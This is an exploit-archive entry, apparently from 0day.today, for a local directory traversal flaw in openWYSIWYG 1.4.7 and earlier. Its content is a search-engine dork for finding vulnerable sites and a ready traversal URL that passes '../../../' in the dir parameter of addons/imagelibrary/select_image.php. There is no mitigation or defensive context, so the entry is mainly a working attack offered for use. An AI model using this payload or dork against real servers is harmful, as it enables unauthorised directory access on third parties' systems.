id: 5155
date: 05/10/2009
title: openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability
author: StAkeR
cves: 

==============================================================
openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability
==============================================================


[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]

[-- Discovered by Juri Gianni aka yeat  --]
[-- allinurl: addons/imagelibrary/select_image.php --]

http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../



#  0day.today [2023-03-26]  #